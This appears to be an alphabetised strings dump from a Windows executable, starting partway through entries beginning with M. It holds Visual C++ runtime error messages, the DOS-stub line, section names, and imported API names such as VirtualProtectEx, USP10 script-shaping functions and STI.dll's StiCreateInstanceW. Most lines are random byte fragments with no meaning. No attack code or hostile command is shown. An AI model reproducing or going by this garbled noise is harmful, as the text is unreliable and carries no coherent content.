LX$$G gG
lXoF{K
M2oXMUa
M6<MGGA
_m%7dl
m@|;7U
|/MB&M$$
M$$bUU[o
($$MDMu
mels e s
Me_M$;
MeMUUA
MeoMjj
MessageBoxA
$mFV$GG
Microsoft Visual C++ Runtime Library
MjajUU
mlOatw
MLW4h5
@$$M~M
$	$	MM
$`	+MM1
MM5R$$G
MM$BO$$$
MME$$G
MMe"MM
MM$f$S
MMGNMM
$MMGuu^
mMiYl'
~MM?jj
M^~MjjE
MMjmejMM
?MMj{tj
MMjV4j$$
MMJwjj
MMM3MU
MMM/GGSMrUU
MM;MM]
MM!_MM
MMMqMMM
#MMM(yMM
MMn/$$L
MMO$f$
MM|OGG
MM+PGG
MM?r]T3LM
+MMS1\bS
MM%S$$5
MMu3MM
MMuM$$
MMu;Ru
MM.UU9
!$MMw$$$_N
MMzZMMq
MNaFMuu
!mNU^B
mQQeM9
MS0Mq0
MultiByteToWideChar
MUU%$$
mUU$U$jj
MVMGG	
M$$y_,
"Mzx<r{J
n1hI(rhnaII
n2/>T3
$n4$uD
nAtn@$
   n e
n ,icer
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
@npa@no$
n%SS,P
	NU`x[
n$$$w$
$$$\o$
o2Cqw!
OGG8uu
o$H$UU
_o_J?O
o ort s,S
ot3anv
</<<<O<U<[<
$$~OUU$
oVSopcrTeO
oW4z;:
p1WK!m
P 5]z[w
p_a-MMM_n
$,p$G#
pGVGUU
Pjju#u$$
p$$*KM2
PrepareTape
Program: 
<program name unknown>
P$r@uEJ
$PSSSyMM
"pS-[T:8
pU/olCc
- pure virtual function call
];q`+)
$"q$$$'
q$>!\$
Q~$$$ 
!q8$$#
$$QbMMj	jSSp
Q\f&fY
qgbuuU
qL.T:;
QNCN,s
QQSVW3
QSUVW3
quu7$$
$Q	$U_[Uq7
Q#UX#^
*\R1F4RoG)`
r>%3,"
R3(INwT
!R@4ZSSn
rB$$$c$$
.rdata
RE.`lI
.reloc
RichB5
@Rr=aT
RSS?xU4U
RtlUnwind
rtobci
runtime error 
Runtime Error!
r$Vbo\
R!x\J-
$$*$$S
,sAddz
ScriptApplyDigitSubstitution
ScriptApplyLogicalWidth
ScriptBreak
ScriptCacheGetHeight
ScriptFreeCache
ScriptGetCMap
ScriptGetFontProperties
ScriptGetGlyphABCWidth
ScriptIsComplex
ScriptItemize
ScriptJustify
ScriptLayout
ScriptPlace
ScriptRecordDigitSubstitution
ScriptStringCPtoX
ScriptStringFree
ScriptString_pLogAttr
ScriptStringValidate
ScriptStringXtoCP
ScriptTextOut
ScriptXtoCP
 Seaao u
SEASUX
SetEnvironmentVariableA
SetHandleCount
SFjj<P
$SI9SS
SING error
$$SjxK
SjYTl`
S'$K$$$f
sL!b!:
$$SM1M
}SMMaE
#>sn 0J
SNSS9S
Sn#SUU
srD	ib[
$$\;SS
SS72MMp
SSjm\<
SSLUU$
$SS;PMM
SSrMM#
SSSaI'$$
^SSSSS
SSSUuu	p
SS{tjj
SS}USS
StiCreateInstanceW
STI.dll
SUBhU:ZSS
@S$$UC$$0UU
SunMonTueWedThuFriSat
~S,`V6
|SwSMM5
!sxt'x9
$$SySS
@tAoIVC
t:Azzm
TbGDCN
tbJg\I
t|c8%Z
TerminateProcess
!This program cannot be run in DOS mode.
!tIc|~
,^Tjjj
Tles n
TLOSS error
tm,W?@
!tN^PE
toJF-R!
	T[~Qf2
tSS$&$$"
tte2th
 ttrbtf
t.;t$$t(
tuSSYQ
tu;uH=
Tuuu~u
t/WWUPj
;$$-$$U
"U$$~\
U1uU1F
u$51;E
U6UJUU
u8Uu$$
U9sUj1
$Uag@U@u
$$UcDU
UCjpV\~U
UDGG36
UEUUuup$$
U(fU$$
>:u#FV
u$$$g0
`uGGjP~
UGoUUl7U
UgU$$m
UGXtjG
U$$H5R
U}HU$$r"$$
%uIuUU
Uje)jMM
$)u$jj
ujjEP9
U$-_$j#jX
$UL>d6
U#LUjj3
{u LXE
U$$Mk<M
) UMM4
uMMxjuu
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
>:uNFV
UnhandledExceptionFilter
`uNnMM
UN"USO_S
,uoJS(
=uOuSS
]:uP+R
user32.dll
USP10.dll
u$sU$$
\US|U$$
U$~s$XH
uT4=b`
UtgRrK
U tuu$Ap$
$(]$uu|
$$-uu$
%U_~U$$
UU$#	$
!<UU47	
uu^6MM
UU7PSS
UU{9uu
UUAeD$$
uuauuj
$UU BM
UU"$$c
UU$*,c$
UU,C{3d
UUcLjj
U"~ue1B
UU$E$uu
UUEUU%
UU.!GG
u$/uhi
UUlJ$$
uuMaM$
UUMiMM
U,uMMH
uu$ms$
UUm$SS
*uuMyM
UU^pMMK
U{U$r$
UUrHSSL
uu-?SS
$$u USS
u.utJ(
UUU%$$
uuUgUUP,
u(uujj.
UUUmgZy
UUUpoUU}8
uu^UU1
uu~UU$j
UUU+USS
$/$uu$uuW
uu]uuz
UUu$Vu
UUWuu	
uuxUUN
UU*YSS_
uu\$$zMM
uuzuu_
UwUMFM
*U{x-N
UyU*UM,FM
uZku$$
$$$V]$
$V$$$$
=>v7qD
VC20XC00U
vcI>PoU$
vcV	8c3
V#fS8]x
vI$$lt
VirtualAlloc
VirtualFree
VirtualProtectEx
&VjjwS
=V>_>l>}>X?p?w?
vlY3m=
v$$M\M
@Vn@@C
VqdQ`	e
`vSSym
Vus<X4
W],}-\
$wC(E_
WideCharToMultiByte
$WJsx3
%woHs$$
w\O$$S
WriteFile
>&W!UK
WUU##BH
w$uuUkU
wUuuVBSS&jj
$$wVMM
x5UUBn
XCMM$@$
x?D	ppZL
X"fI;!
$$x#MMM
=xN5fE
x@oAoo
`.xSSU
&Y1\jj
Y"~*'9
yA$$$/
ybHtHM
Yb^[iv
YCw3S]
ydN$$9#]Z
$-yG?(
 ynbOi
ynpu91
(ys96$
.$$YSdMMt
ytJ#0D
$#Y$UU
=Yx4^{
yy3	5I
 $$zdj
zH%UUM"
.zMM]U
$z$$O_
zUUWm$W$
z^UUYc
zUUz$$